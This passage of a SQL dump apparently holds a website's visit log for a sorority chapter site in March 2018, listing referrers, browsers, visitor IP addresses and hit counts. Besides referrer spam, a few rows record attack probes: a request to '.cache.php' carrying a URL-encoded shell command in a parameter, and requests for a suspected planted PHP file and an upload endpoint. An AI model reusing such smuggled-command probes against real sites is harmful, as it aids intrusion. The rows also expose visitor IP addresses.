gz.org','Chrome','Macintosh','64.0.3282.140','','50.225.39.77','000',5,0),(26631,'2018-03-15','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.31','000',1,0),(26632,'2018-03-15','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.234','000',1,0),(26633,'2018-03-15','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.196','000',1,0),(26634,'2018-03-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(26635,'2018-03-15','https://zphiblgz.org','Chrome','Linux','51.0.2704.103','','104.222.39.134','000',1,0),(26636,'2018-03-15','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','66.249.83.28','000',1,0),(26637,'2018-03-15','http://www.zphibmaryland.org/chapters/','Chrome','Android','65.0.3325.109','','73.128.133.217','000',2,0),(26638,'2018-03-15','https://zphiblgz.org','Firefox','Windows','50.0','','50.225.39.34','000',2,0),(26639,'2018-03-15','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.11','000',4,0),(26640,'2018-03-15','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.239','000',1,0),(26641,'2018-03-15','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.105','000',1,0),(26642,'2018-03-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.206','000',1,0),(26643,'2018-03-15','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.220','000',1,0),(26644,'2018-03-15','https://zphiblgz.org','MSIE','Windows','11.0','','35.162.55.4','000',1,0),(26645,'2018-03-15','https://zphiblgz.org','MSIE','Windows','8.0','','35.162.55.4','000',1,0),(26646,'2018-03-15','https://zphiblgz.org','MSIE','Windows','6.0','','35.162.55.4','000',2,0),(26647,'2018-03-15','http://fartunabest.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(26648,'2018-03-15','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.181','000',2,0),(26649,'2018-03-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(26650,'2018-03-15','https://zphiblgz.org','MSIE','Windows','7.0','','35.162.55.4','000',1,0),(26651,'2018-03-15','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','50.225.39.35','000',7,0),(26652,'2018-03-15','https://td-l-market.ru/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26653,'2018-03-15','https://zphiblgz.org','Python-urllib','Unknown','2.7','','35.162.55.4','000',3,0),(26654,'2018-03-15','https://zphiblgz.org','Firefox','Windows','39.0','','35.162.55.4','000',1,0),(26655,'2018-03-15','https://www.google.com/','Chrome','Macintosh','63.0.3239.132','','100.16.174.187','000',2,0),(26656,'2018-03-15','https://zphiblgz.org/','Opera Next','Windows','36.0.2130.80','','77.120.125.23','000',2,0),(26657,'2018-03-15','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','198.51.197.42','000',3,0),(26658,'2018-03-15','https://zphiblgz.org','Go--client','Unknown','1.1','','54.157.19.249','000',1,0),(26659,'2018-03-15','https://zphiblgz.org','Go--client','Unknown','2.0','','54.157.19.249','000',1,0),(26660,'2018-03-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(26661,'2018-03-15','https://zphiblgz.org','Chrome','Windows','65.0.3325.162','','100.16.228.135','000',4,0),(26662,'2018-03-15','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','96.127.158.234','000',2,0),(26663,'2018-03-15','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.32','000',1,0),(26664,'2018-03-15','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(26665,'2018-03-15','https://zphiblgz.org','Edge','Windows','16.16299','','96.244.50.179','000',11,0),(26666,'2018-03-15','https://zphiblgz.org','MSIE','Windows','11.0','','98.218.24.6','000',5,0),(26667,'2018-03-15','https://zphiblgz.org/scholarship/recommendation/','Firefox','Macintosh','52.0','','71.127.147.218','000',1,0),(26668,'2018-03-15','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.73','000',2,0),(26669,'2018-03-15','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','67.215.191.167','000',2,0),(26670,'2018-03-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',2,0),(26671,'2018-03-15','https://zphiblgz.org','Firefox','Windows','40.1','','81.213.248.7','000',2,0),(26672,'2018-03-15','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.35','000',1,0),(26673,'2018-03-15','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.35','000',1,0),(26674,'2018-03-15','https://www.google.com/','Safari','Macintosh','9.0.1','','32.215.12.48','000',2,0),(26675,'2018-03-15','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','184.154.47.2','000',2,0),(26676,'2018-03-15','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(26677,'2018-03-15','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(26678,'2018-03-15','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(26679,'2018-03-15','https://zphiblgz.org','Chrome','Linux','58.0.3029.110','','107.21.196.166','000',2,0),(26680,'2018-03-15','http://essaysondeadline.com','Firefox','Windows','32.1','','77.120.125.23','000',2,0),(26681,'2018-03-15','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.109','000',2,0),(26682,'2018-03-15','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.43','000',1,0),(26683,'2018-03-15','https://zphiblgz.org','Firefox','Linux','29.0','','104.144.93.47','000',2,0),(26684,'2018-03-15','https://zphiblgz.org','Firefox','Windows','40.1','','74.36.129.223','000',2,0),(26685,'2018-03-15','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','208.253.105.254','000',3,0),(26686,'2018-03-15','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(26687,'2018-03-15','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','148.251.54.44','000',2,0),(26688,'2018-03-15','https://zphiblgz.org','Safari','Macintosh','6.0.3','','88.99.27.172','000',1,0),(26689,'2018-03-15','https://zphiblgz.org','Safari','Macintosh','11.0.3','','88.99.27.172','000',2,0),(26690,'2018-03-15','https://www.google.com/','Chrome','Windows','65.0.3325.162','','172.73.140.242','000',2,0),(26691,'2018-03-15','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','5.9.145.132','000',2,0),(26692,'2018-03-15','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(26693,'2018-03-15','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(26694,'2018-03-15','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',10,0),(26695,'2018-03-15','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.140','','5.9.112.6','000',1,0),(26696,'2018-03-15','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','5.9.94.207','000',1,0),(26697,'2018-03-15','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','5.9.112.6','000',1,0),(26698,'2018-03-15','http://krasivoe-hd.net/','MSIE','Windows','5.0','','46.119.126.51','000',2,0),(26699,'2018-03-15','https://zphiblgz.org','MSIE','Windows','6.0','','179.218.48.211','000',2,0),(26700,'2018-03-15','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(26701,'2018-03-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',4,0),(26702,'2018-03-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','45.61.168.18','000',2,0),(26703,'2018-03-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','172.245.62.146','000',1,0),(26704,'2018-03-16','https://hoztorg-opt.ru/','Opera','Windows','7.60','','178.137.18.222','000',2,0),(26705,'2018-03-16','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(26706,'2018-03-16','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.111.185','000',14,0),(26707,'2018-03-16','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(26708,'2018-03-16','https://zphiblgz.org/','MSIE','Windows','9.0','','31.130.21.164','000',2,0),(26709,'2018-03-16','https://zphiblgz.org','Safari','iPhone','11.0','','174.204.39.80','000',3,0),(26710,'2018-03-16','https://www.google.com/','Firefox','Windows','52.0','','8.44.100.11','000',7,0),(26711,'2018-03-16','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.27.77','000',1,0),(26712,'2018-03-16','http://www.zphiblgz.org/jm-ajax/upload_file/','Chrome','Windows','42.0.2311.152','','207.244.149.27','000',1,0),(26713,'2018-03-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1728.7OQX3x6-f_avUa5mWOYsEdoxN1_gu_zrRaEY7z4MUXA.5c2171a090aaedd760c5bb379bdb3611cad2a551&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043Xy1CSzNtY3Q2emk1ekZ5VkM0YmxPSGY5X1hYNlQzTDI5bUc4WGJwSHdQdyws&sign=9a0ef09c4d3bc0a3c1ff89353f838d45&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.153.74','000',2,0),(26714,'2018-03-16','https://zphiblgz.org/scholarship/','Edge','Windows','15.15063','','50.225.39.78','000',2,0),(26715,'2018-03-16','https://zphiblgz.org/history/','Opera Next','Windows','49.0.2725.47','','46.161.9.9','000',1,0),(26716,'2018-03-16','https://zphiblgz.org','Firefox','Windows','40.1','','103.229.121.217','000',2,0),(26717,'2018-03-16','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(26718,'2018-03-16','https://nakozhe.com/','Opera','Windows','8.01','','134.249.48.151','000',3,0),(26719,'2018-03-16','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.30','000',1,0),(26720,'2018-03-16','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.30','000',1,0),(26721,'2018-03-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1728.zuRkOZn8Na_MXclYSufwn0wlAz4hTAwRNv7UMcPrPJI.e2be867c3c75a114317b82f392112b1b33414de1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043d01kUkZmVVo5MnU2ZXNqeEJQT0ozNEdsSkNobWVJanlnNDFTYWlJR3ZwZyws&sign=b16c8be56f6de91d219155bc41179f21&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.158.143','000',2,0),(26722,'2018-03-16','https://kerch.site/','MSIE','Windows','6.0','','134.249.53.158','000',3,0),(26723,'2018-03-16','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1728.yB2WnBR_5VvOFterJabrw7A8wtcC8UZ1VgWeHZTVnOI.b77eea92c4a3717d21e29a84e689bca13ff7efe2&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041aHp3MmV4aTM3MkhJa2s1TmlDWTRUblA2VnMzMlNJektpV3dSdldUOWxhZyws&sign=0207b2fc6e5b664126039020c3140b94&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.237.21','000',2,0),(26724,'2018-03-16','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.27','000',1,0),(26725,'2018-03-16','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(26726,'2018-03-16','https://zphiblgz.org','MSIE','Windows','11.0','','170.93.144.3','000',8,0),(26727,'2018-03-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.210','000',1,0),(26728,'2018-03-16','https://zphiblgz.org','Chrome','Macintosh','52.0.2743.116','','54.145.43.241','000',2,0),(26729,'2018-03-16','http://zphiblgz.org/','Firefox','Windows','33.1','','188.165.4.128','000',2,0),(26730,'2018-03-16','http://zphiblgz.org/','Firefox','Windows','26.0','','195.22.125.74','000',3,0),(26731,'2018-03-16','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','50.225.39.87','000',2,0),(26732,'2018-03-16','https://zphiblgz.org','Safari','Macintosh','11.0.2','','5.9.112.6','000',1,0),(26733,'2018-03-16','https://zphiblgz.org','Chrome','Windows','45.0.2454.85','','66.129.102.52','000',7,0),(26734,'2018-03-16','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','198.51.197.42','000',5,0),(26735,'2018-03-16','https://zphiblgz.org/','Chrome','Macintosh','64.0.3282.186','','68.33.89.74','000',1,0),(26736,'2018-03-16','https://happysong.ru/','MSIE','Windows','6.0','','178.159.37.55','000',6,0),(26737,'2018-03-16','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.27','000',1,0),(26738,'2018-03-16','http://makler.org.ua/','Unknown','Unknown','Unknown','','178.137.18.222','000',3,0),(26739,'2018-03-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(26740,'2018-03-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',2,0),(26741,'2018-03-16','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','77.120.125.23','000',2,0),(26742,'2018-03-16','https://zphiblgz.org/ts_teams/nathalia-drew/','AppleWebKit','Windows','534','','65.55.210.63','000',1,0),(26743,'2018-03-16','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(26744,'2018-03-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.208','000',1,0),(26745,'2018-03-16','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(26746,'2018-03-16','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(26747,'2018-03-16','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(26748,'2018-03-16','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(26749,'2018-03-16','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.30','000',1,0),(26750,'2018-03-16','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','167.102.191.18','000',5,0),(26751,'2018-03-16','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','198.143.155.138','000',2,0),(26752,'2018-03-16','https://laminat.com.ua/','MSIE','Windows','6.0','','46.119.122.170','000',3,0),(26753,'2018-03-16','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.27','000',1,0),(26754,'2018-03-16','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(26755,'2018-03-16','https://www.google.com/','Safari','iPhone','11.0','','173.73.229.168','000',5,0),(26756,'2018-03-16','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.28','000',1,0),(26757,'2018-03-16','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(26758,'2018-03-16','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','184.154.189.90','000',2,0),(26759,'2018-03-16','http://zphiblgz.org/','Firefox','Windows','40.1','','188.165.4.128','000',2,0),(26760,'2018-03-16','https://dermatovenerologiya.com/','MSIE','Windows','6.0','','178.137.91.90','000',3,0),(26761,'2018-03-16','http://dressaytam.com','Safari','Macintosh','11.0.1','','77.120.125.23','000',2,0),(26762,'2018-03-16','https://zphiblgz.org','Firefox','Macintosh','57.0','','71.127.150.254','000',29,0),(26763,'2018-03-16','https://zphiblgz.org','Safari','iPhone','11.0','','173.64.85.9','000',3,0),(26764,'2018-03-16','https://www.bing.com/','Edge','Windows','16.16299','','108.22.245.151','000',3,0),(26765,'2018-03-16','http://slomm.ru/','MSIE','Windows','6.0','','46.119.121.22','000',1,0),(26766,'2018-03-16','https://zphiblgz.org','Chrome','iPhone','65.0.3325.152','','71.114.37.67','000',3,0),(26767,'2018-03-17','https://zphiblgz.org/event/chic-fil-spirit-night/','Firefox','Windows','43.1','','146.185.223.25','000',2,0),(26768,'2018-03-17','https://zphiblgz.org/','Chrome','iPhone','65.0.3325.152','','71.114.37.67','000',4,0),(26769,'2018-03-17','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.1','000',1,0),(26770,'2018-03-17','https://kazka.ru/','MSIE','Windows','6.0','','37.115.112.228','000',1,0),(26771,'2018-03-17','http://svetka.info/','Unknown','Unknown','Unknown','','46.118.152.50','000',2,0),(26772,'2018-03-17','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.160','000',1,0),(26773,'2018-03-17','https://zphiblgz.org/service/zen/','AppleWebKit','Windows','534','','199.30.25.172','000',1,0),(26774,'2018-03-17','http://atyrau.xkaz.org/','Opera','Windows','7.02','','46.119.122.170','000',2,0),(26775,'2018-03-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1729.ocEjsJ7z4pKhxbzeFvKcZlvnJ4lVSw0Z88Ji95uWdnk.ba5a5635b359c5a859abaae7c49db40cb915e1a9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043aU1DVHIwVVFFUExGWjVzN0VZY3FrWEw4ckZtS1RYdjRVd0djUkNJdkxjZyws&sign=e6b85bba56b871cd118e409c047874d3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.143.71','000',2,0),(26776,'2018-03-17','http://headpharmacy.com/','MSIE','Windows','6.0','','46.118.152.50','000',2,0),(26777,'2018-03-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1729.BQ2Zuk3tY8lq2ooNBQkFCoqOokpWGuFzUzujgCy-fKs.db3343050a79605b954a3e343b70e8db85547afc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042bXd5ZTl6ZFVaeVNBQ05jcXNlT1lKdXhqX2lLNFhobTVCV21PSlJyMHEtdyws&sign=bd0e7ff0b488d1bfd3c9d59020ec7923&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.232.176','000',2,0),(26778,'2018-03-17','http://zphiblgz.org','Opera','Windows','8.50','','195.22.127.175','000',2,0),(26779,'2018-03-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1729.9iHkgYHO3qYZjJv2TvY7XUNwcaY3rYUqllNREoIpBSQ.813fca53d8cf30423591164bf3b3f08f79afe826&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZldOdER4ekwzZ2txUTAxdDZWenROX0dvRFFFLWhzbGt5WkhRTVZxalFFZyws&sign=763de2226bba63b480ea09f2e0288f38&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.44.152','000',2,0),(26780,'2018-03-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1729.6B34VLlTh6YEPfIg8ZSjieD0PYhXewNmuqMQN1Ngues.3f41c490adb7173e9eac17f8aa83434695c0bbd8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TVNJdlRoVmM2RWprS0RKdk8zRlEtU3V6VVRuZGphd2ZGT1NFa2FSeUw4USws&sign=c1e72546fa08fcfcf51415a06d923753&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.182.117.196','000',2,0),(26781,'2018-03-17','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.104','000',2,0),(26782,'2018-03-17','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.26','000',1,0),(26783,'2018-03-17','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.15','000',1,0),(26784,'2018-03-17','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.139','000',1,0),(26785,'2018-03-17','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.7','000',2,0),(26786,'2018-03-17','http://zphiblgz.org/.cache.php?localdate=hszm9&localtime=echo%20-n%20%22123%22%20%7C%20md5sum','MSIE','Windows','6.0','','71.213.214.218','000',1,0),(26787,'2018-03-17','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1729.4u188TTw6_OoAp4R2EdiylrURptEWwijoqZ_7Q_OlbU.623ccd68baa0f8976b1841bbf7c6d056527523d7&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041WlZpV2tuaGtGUnFqZXdOLUJvQnJXeVhQcktPY3djT3QtMlBvMVVYXzF6Zyws&sign=670f830fcd53d9f91e0e8ea56948ddca&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.81.28','000',2,0),(26788,'2018-03-17','https://yandex.ua/clck/jsredir?from=yandex.ua%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1729._MdcEEsIOUIPJSFhWsrdwtr0OsAim8zpPhDtUxkgR0Y.0299670d76bea9528de89e551665e4c251449317&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043SXhwcE1LVUxOTjJuMmNmcmp2bDl2a0ctSk1uSkpxQWNvR3M0ME9qTkhRUSws&sign=c176a5718ac13a52a4572d8ae2a1be43&keyno=0&b64e=2&l10n=uk','Firefox','Linux','52.0','','46.101.60.250','000',2,0),(26789,'2018-03-17','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(26790,'2018-03-17','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(26791,'2018-03-17','http://zphiblgz.org/wp-includes/css/modules.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(26792,'2018-03-17','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(26793,'2018-03-17','https://zphiblgz.org/','Chrome','iPhone','65.0.3325.152','','174.204.16.152','000',2,0),(26794,'2018-03-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(26795,'2018-03-17','https://www.google.com/','Safari','iPhone','11.0','','96.244.229.165','000',4,0),(26796,'2018-03-17','https://zphiblgz.org/','Firefox','Windows','53.0','','46.161.9.18','000',3,0),(26797,'2018-03-17','http://www.google.com/','Chrome','Android','65.0.3325.109','','174.205.21.54','000',5,0),(26798,'2018-03-17','https://www.google.com/','Chrome','Android','65.0.3325.109','','73.39.186.188','000',21,0),(26799,'2018-03-17','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(26800,'2018-03-17','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(26801,'2018-03-17','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(26802,'2018-03-17','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.181','000',2,0),(26803,'2018-03-17','http://metallo-konstruktsii.ru/','MSIE','Windows','7.0','','46.118.152.50','000',3,0),(26804,'2018-03-17','https://www.google.com/','Chrome','iPhone','65.0.3325.152','','208.54.35.189','000',2,0),(26805,'2018-03-17','http://www.zphiblgz.org/jm-ajax/upload_file/','Chrome','Windows','42.0.2311.152','','207.244.149.28','000',3,0),(26806,'2018-03-17','https://picturesmania.com/','MSIE','Windows','6.0','','178.137.91.90','000',2,0),(26807,'2018-03-17','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','69.143.195.71','000',3,0),(26808,'2018-03-17','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(26809,'2018-03-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(26810,'2018-03-17','http://l.instagram.com/?u=http%3A%2F%2Fwww.zphiblgz.org%2F&e=ATM0ZPoV7O-ALPsp3khssjoIwa6n45FP0K6_-ztmPYlRXI8RO_WyP5bJfHZSqZ9bbDw0g9a8tfVPgBZvuIHa5zj7QiQToDVz8tINy-Qic7TKF-Zo-0SvgKeKTFbsdP0Gfg','AppleWebKit','iPhone','604.5.6','','172.58.185.108','000',4,0),(26811,'2018-03-17','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.32','000',1,0),(26812,'2018-03-17','https://www.google.com/','Chrome','Windows','61.0.3163.100','','24.35.28.253','000',12,0),(26813,'2018-03-17','https://zphiblgz.org','Firefox','Windows','40.1','','189.18.181.123','000',2,0),(26814,'2018-03-17','https://zphiblgz.org','Chrome','Chrome OS','64.0.3282.190','','50.246.71.62','000',4,0),(26815,'2018-03-17','http://www.yur-p.ru/','Opera','Windows','7.11','','178.137.91.90','000',3,0),(26816,'2018-03-17','http://suzuki-metropolis.kiev.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26817,'2018-03-17','https://zphiblgz.org/','Firefox','Windows','53.0','','46.161.9.68','000',3,0),(26818,'2018-03-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.208','000',1,0),(26819,'2018-03-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.218','000',1,0),(26820,'2018-03-17','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(26821,'2018-03-17','https://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','77.120.125.23','000',2,0),(26822,'2018-03-17','http://whiteessay.com','Firefox','Windows','43.1','','77.120.125.23','000',2,0),(26823,'2018-03-17','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(26824,'2018-03-17','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.99','000',1,0),(26825,'2018-03-17','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(26826,'2018-03-17','https://zphiblgz.org/','MSIE','Windows','9.0','','149.202.50.209','000',1,0),(26827,'2018-03-17','https://zphiblgz.org','Safari','Macintosh','11.0.1','','52.165.148.51','000',1,0),(26828,'2018-03-17','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','198.143.133.156','000',1,0),(26829,'2018-03-17','https://www.zphiblgz.org:443/','Chrome','Windows','65.0.3325.146','','198.143.133.157','000',1,0),(26830,'2018-03-17','http://search.myway.com/search/GGweb.jhtml?n=78399fe6&p2=%5EBYT%5Exdm186%5ETTAB02%5Eus&ptb=11839811-7DAC-4F60-825D-BC79CE8FBF56&qs=&si=main1&ss=sub&st=hp&trs=wtt&tpr=sug&ts=1521342682721&ssrt=70&searchfor=zeta+phi+beta+sorority+incorporated&pn=5&ots=1521342832816','Firefox','Windows','27.0','','47.37.211.71','000',1,0),(26831,'2018-03-17','https://zphiblgz.org/scholarship/','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',4,0),(26832,'2018-03-17','http://zphiblgz.org/','Firefox','Windows','39.1','','176.109.241.177','000',3,0),(26833,'2018-03-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(26834,'2018-03-17','https://zphiblgz.org/','Chrome','Macintosh','63.0.3239.84','','98.125.111.17','000',2,0),(26835,'2018-03-17','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','192.198.80.227','000',1,0),(26836,'2018-03-17','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(26837,'2018-03-17','https://zphi